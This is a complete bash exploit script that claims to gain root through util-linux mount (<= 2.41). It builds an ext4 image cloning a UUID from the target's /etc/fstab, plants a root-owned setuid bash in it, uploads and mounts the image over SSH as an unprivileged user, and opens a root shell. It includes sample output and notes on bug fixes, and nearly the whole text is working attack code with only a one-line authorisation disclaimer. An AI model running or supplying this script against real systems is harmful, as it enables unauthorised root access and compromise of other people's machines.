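#!/bin/bash
#
# oxagast
# marshall@oxasploits.com
#
# A Universally Ubiquitous ID plus an evil filesystem swap:
# A case study demonstrated in mount.
#
# sudo ./mount-under-2.42-0day-sploit.sh -u charlie -h 10.0.1.2 -k /home/attacker/.ssh/id_ed25519
# mount <= 2.41 exploit by oxagast
#
# [?] Checking for vulnerabilty...
# [!] Good, looks like the victim is vulnerable!
# [*] 10MB file gen...
# [*] Created mountpoint...
# [*] Created filesystem with UUID 116bf815-c476-4a78-a384-0169e828dcc5
# [*] Grabbing remote copy of /usr/bin/bash to use as payload on victim...
# [*] Payload copied to evil fs... permissions updated...
# [*] Hey bby, why don't you come on over here and mount this...
# [*] Mounted evil fs on 10.0.1.2...
# [!] Spawning shell...
# whoami
# root
#
# Preconditions (the script checks the first three, see usage() for the
# full write-up of the technique):
#   * /etc/fstab on the target has an entry whose source is "UUID=..." and
#     whose option list contains the tokens user (or users), suid and exec,
#     and none of nosuid/noexec.  Per mount(8) "user" implies nosuid,noexec,
#     nodev unless those are overridden *later* on the same option line; the
#     check below only looks for the tokens, not their order, so a positive
#     result is still worth confirming by hand.
#   * SSH access to the target as an unprivileged user (key or password).
#   * Run locally as root with fallocate, mkfs.ext4, mount/umount, ssh and
#     scp available: the payload inside the image must be owned by uid 0 for
#     the setuid bit to hand out a root shell.
#
# Review notes on this revision (behaviour fixes, interface unchanged):
#   * The success check used `[[ $WHO -eq "root" ]]`.  Inside [[ ]] -eq is an
#     arithmetic comparison, so both non-numeric operands evaluate to 0 and
#     the test was true for ANY whoami output -- a failed exploit was reported
#     as success and a non-root shell was spawned.  It is now a string ==.
#   * /etc/fstab is parsed field-wise with awk: tab-separated entries, comment
#     lines, multiple matching lines and the substrings "nouser"/"nosuid"/
#     "noexec" all broke the previous grep|cut pipeline (a multi-line UUID in
#     particular corrupted every later command).
#   * ssh-copy-id ignored -p, so key installation failed on non-default ports.
#   * A user-supplied key named exploit.key was deleted before use; only a key
#     the script generated itself is removed now.
#   * Local loop mount and image are cleaned up on every exit path via a trap;
#     the uploaded image is removed from the target's home after the run.
#   * All expansions are quoted and `set -euo pipefail` is on.
#
# Only run this against systems you are authorised to test.

set -euo pipefail

usage() {
  echo "Linux mount <= 2.41 exploit by oxagast"
  echo
  echo "Usage: $0 -h 10.0.1.2 -u charlie"
  echo
  echo "For the HOST to be vulnerable it needs to have an /etc/fstab entry that"
  echo "uses a UUID to refer to the device, as well as having mount options"
  echo "equivilent to 'user,suid,exec'. Access to the vulnerable host via"
  echo "ssh is also a requirement, though this was for ease of writing the"
  echo "exploit and not a true requirement for this to work."
  echo "A ext4 filesystem is created on a 10mb file with a UUID that is a duplicate"
  echo "of another UUID listed in /etc/fstab where user,suid,exec are required"
  echo "options (weather they are explicityly stated or implied), then"
  echo "/bin/bash is copied to the fs, where it's permissions are subsequently"
  echo "modified to include the suid bit set, the fs is dismounted and the resulting"
  echo "file is uploaded to the vuln box, where the file's filesystem with"
  echo "the cloned UUID is mounted in place of it's cloned UUID brother."
  echo "Mount doesn't check if the mount already exists as something else"
  echo "before letting you double up on the same mount point, and because user is"
  echo "specified, we can mount that fs as a user other than root,"
  echo "but still be able to execute the copy of bash sitting on the evil"
  echo "filesystem we created. This respects the suid bit setting because of fstab"
  echo "and executes the file as root, where a shell is waiting for us."
  exit 1
}

# Print one "UUID<TAB>mountpoint<TAB>options" line for every fstab entry whose
# source is a UUID= tag and whose comma-separated option list contains the
# tokens user/users, suid and exec.  Tokens are matched whole, so nouser,
# nosuid and noexec do not count as user/suid/exec.  Comment lines and lines
# with fewer than four fields are skipped; fields may be tab- or space-separated.
# Argument: $1 - the text of /etc/fstab.
fstab_candidates() {
  awk '
    /^[[:space:]]*#/ || NF < 4 { next }
    $1 !~ /^UUID=/ { next }
    {
      n = split($4, opt, ",")
      u = s = e = 0
      for (i = 1; i <= n; i++) {
        if (opt[i] == "user" || opt[i] == "users") u = 1
        else if (opt[i] == "suid") s = 1
        else if (opt[i] == "exec") e = 1
      }
      if (u && s && e) {
        sub(/^UUID=/, "", $1)
        print $1 "\t" $2 "\t" $4
      }
    }' <<<"$1"
}

# True when the comma-separated option list $1 contains the whole token $2.
has_opt() {
  [[ ",$1," == *",$2,"* ]]
}

readonly DEFAULT_KEY="exploit.key"
EK="${DEFAULT_KEY}"
PORT="22"
HOST=""
USERNAME=""

while getopts ":h:u:p:k:" OP; do
  case "${OP}" in
    u) USERNAME=${OPTARG} ;;
    h) HOST=${OPTARG} ;;
    p) PORT=${OPTARG} ;;
    k) EK=${OPTARG} ;;
    *) usage ;;
  esac
done
shift $((OPTIND - 1))

if [[ -z "${HOST}" || -z "${USERNAME}" ]]; then
  usage
fi

echo "mount <= 2.41 exploit by oxagast"
echo

if [[ $(id -u) != 0 ]]; then
  echo "[x] You need to run this locally as root!"
  exit 1
fi

TARGET="${USERNAME}@${HOST}"
SSH=(ssh -p "${PORT}" -i "${EK}")
SCP=(scp -q -P "${PORT}" -i "${EK}")

# Local artifacts keep their historical names in the current directory:
# an existing ./payload is reused instead of fetching bash from the target.
readonly LOCAL_IMG="exploit"
readonly LOCAL_MNT="expdir"
readonly LOCAL_PAYLOAD="payload"
GENERATED_KEY=0   # 1 once we created exploit.key ourselves (only then delete it)
ARTIFACTS=0       # 1 once image/mountpoint/payload may exist on disk

# Runs on every exit: unmount the loop image if still mounted, then remove
# only what this run created.
cleanup_local() {
  if (( ARTIFACTS )); then
    if mountpoint -q "${LOCAL_MNT}" 2>/dev/null; then
      umount "${LOCAL_MNT}" || true
    fi
    rm -rf -- "${LOCAL_IMG}" "${LOCAL_MNT}" "${LOCAL_PAYLOAD}"
  fi
  if (( GENERATED_KEY )); then
    rm -f -- "${DEFAULT_KEY}" "${DEFAULT_KEY}.pub"
  fi
}
trap cleanup_local EXIT

if [[ "${EK}" == "${DEFAULT_KEY}" ]]; then
  echo "[*] Generating key..."
  rm -f -- "${DEFAULT_KEY}" "${DEFAULT_KEY}.pub"
  ssh-keygen -f "${DEFAULT_KEY}" -N "" >/dev/null
  GENERATED_KEY=1
  echo "[*] Copying key..."
  echo "[?] Private key not specified, please enter SSH password..."
  # Errors are deliberately hidden here; the access check below reports them.
  ssh-copy-id -i "${DEFAULT_KEY}.pub" -p "${PORT}" -f "${TARGET}" >/dev/null 2>&1 || true
fi

echo "[?] Checking for vulnerabilty..."
if ! "${SSH[@]}" "${TARGET}" true >/dev/null; then
  echo "[x] Shit, Doesn't look like we have SSH access!"
  exit 1
fi

# Fetch fstab once and parse it locally.
FSTAB=$("${SSH[@]}" "${TARGET}" cat /etc/fstab) || FSTAB=""

VUUID=""
MDIR=""
HAS_CANDIDATE=0
# First UUID entry with user+suid+exec and without nosuid/noexec wins.
while IFS=$'\t' read -r uuid mdir opts; do
  [[ -n "${uuid}" ]] || continue
  HAS_CANDIDATE=1
  if has_opt "${opts}" nosuid || has_opt "${opts}" noexec; then
    continue
  fi
  VUUID="${uuid}"
  MDIR="${mdir}"
  break
done < <(fstab_candidates "${FSTAB}")

if [[ -z "${VUUID}" ]]; then
  if (( HAS_CANDIDATE )); then
    echo "[x] Drats, not vulnerable! nosuid or noexec present!"
  else
    echo "[x] Fuck, its not vulnerable! Missing correct mount options or UUID reference."
  fi
  echo "[x] Enteries in /etc/fstab are:"
  grep -v '#' <<<"${FSTAB}" || true
  exit 1
fi
echo "[!] Good, looks like the victim is vulnerable!"

ARTIFACTS=1
fallocate -l 10M "${LOCAL_IMG}"
echo "[*] 10MB file gen..."
mkdir -p "${LOCAL_MNT}"
echo "[*] Created mountpoint..."
# -F: the image is a regular file, not a block device (replaces the `yes |`
# answer to mke2fs' "Proceed anyway?" prompt, which tripped pipefail).
mkfs.ext4 -q -F -U "${VUUID}" -L exploit "${LOCAL_IMG}" >/dev/null 2>&1
echo "[*] Created filesystem with UUID ${VUUID}"
mount -o loop "${LOCAL_IMG}" "${LOCAL_MNT}"

if [[ ! -f "./${LOCAL_PAYLOAD}" ]]; then
  echo "[*] Grabbing remote copy of /usr/bin/bash to use as payload on victim..."
  "${SCP[@]}" "${TARGET}:/usr/bin/bash" "${LOCAL_PAYLOAD}"
fi
cp -- "./${LOCAL_PAYLOAD}" "${LOCAL_MNT}/bash"
# The owner is who setuid escalates to; chown clears the s bits, so chmod last.
chown 0:0 "${LOCAL_MNT}/bash"
chmod a+s "${LOCAL_MNT}/bash"
echo "[*] Payload copied to evil fs... permissions updated..."
sync
umount "${LOCAL_MNT}"

echo "[*] Hey bby, why don't you come on over here and mount this..."
# The image lands in the target user's home; `mount exploit` is run from there.
"${SCP[@]}" "${LOCAL_IMG}" "${TARGET}:"

RC=0
if "${SSH[@]}" "${TARGET}" mount exploit; then
  echo "[*] Mounted evil fs on ${HOST}..."
  echo "[!] Spawning shell..."
  sleep 1
  echo "whoami"
  WHO=$("${SSH[@]}" "${TARGET}" "${MDIR}/bash" -p -c whoami) || WHO=""
  echo "${WHO}"
  # String comparison: with -eq both sides were arithmetic-evaluated to 0 and
  # the branch was taken for any non-numeric output.
  if [[ "${WHO}" == "root" ]]; then
    # -t: allocate a tty so the root shell gets a prompt and job control.
    "${SSH[@]}" -t "${TARGET}" "${MDIR}/bash" -p || true   # boom
  else
    echo "[x] Oof. Exploit failed! Sorry!"
    RC=1
  fi
  "${SSH[@]}" "${TARGET}" umount "${MDIR}" || true
else
  echo "[x] Oof. Exploit failed! Sorry! mount on ${HOST} did not succeed."
  RC=1
fi

# Do not leave the image behind in the target's home directory.
"${SSH[@]}" "${TARGET}" rm -f exploit || true
echo "[*] Cleaning up local files..."
exit "${RC}"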